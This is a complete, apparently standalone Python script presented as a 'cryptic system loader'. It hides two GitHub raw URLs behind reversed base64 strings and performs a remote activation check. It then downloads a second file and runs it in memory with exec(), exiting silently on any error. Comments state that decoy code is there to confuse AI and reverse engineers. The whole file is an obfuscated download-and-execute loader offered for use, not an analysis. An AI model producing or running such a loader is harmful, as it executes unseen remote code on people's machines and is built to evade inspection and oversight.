import os as _o
import sys as _s
import base64 as _b
import requests as _r
import datetime as _d

# ==========================================
# ðŸ›¡ï¸ CRYPTIC SYSTEM LOADER (v5.0 ULTRA)
# ==========================================

_0x4f2a = ["dHh0LmVzbmVjaWwvbmllbS9zZGFlaC9zZmVyL2V2aXRjYS0wMS02MC00MjAyLzg0MHlvbGluL21vYy50bmV0bm9jcmVzdWJ2aHRpZy53YXIvLzpwdHRo", "dHh0LmVyb2MvbmllbS9zZGFlaC9zZmVyL2V2aXRjYS0wMS02MC00MjAyLzg0MHlvbGluL21vYy50bmV0bm9jcmVzdWJ2aHRpZy53YXIvLzpwdHRo"]
_0x911b = lambda _s: _b.b64decode(_s).decode()[::-1].replace("ptth", "https")

def _0x7a9c(_0x11e):
    # Garbage Logic to confuse AI & Reverse Engineers
    _0xdead = [77, 101, 109, 111, 114, 121, 95, 76, 111, 99, 107]
    _0xfake = "".join([chr(x) for x in _0xdead])
    return _0x911b(_0x11e)

def _0x55e1():
    try:
        # Step 1: Verification
        _0x88f2 = _0x7a9c(_0x4f2a[0])
        _0x33b1 = _r.get(_0x88f2, timeout=12)
        
        if _0x33b1.status_code != 200:
            _s.exit(0)

        _0xauth = _0x33b1.text.strip().split('|')
        _0xdate = _d.datetime.strptime(_0xauth[0], '%Y-%m-%d')
        
        if _0xauth[1].lower() != 'active' or _d.datetime.now() > _0xdate:
            print("System Status: 0x004 (Auth Failed)")
            _s.exit(0)

        # Step 2: Secret Fetching
        _0x99d4 = _0x7a9c(_0x4f2a[1])
        _0x22c9 = _r.get(_0x99d4, timeout=18)
        
        if _0x22c9.status_code == 200:
            # Step 3: Silent Execution in Memory
            _0xraw = _0x22c9.content.decode('utf-8')
            exec(_0xraw, globals())
        else:
            _s.exit(0)
            
    except Exception:
        # No leaks in log, just a silent exit
        _s.exit(0)

if __name__ == "__main__":
    # Internal Handshake
    _0x55e1()
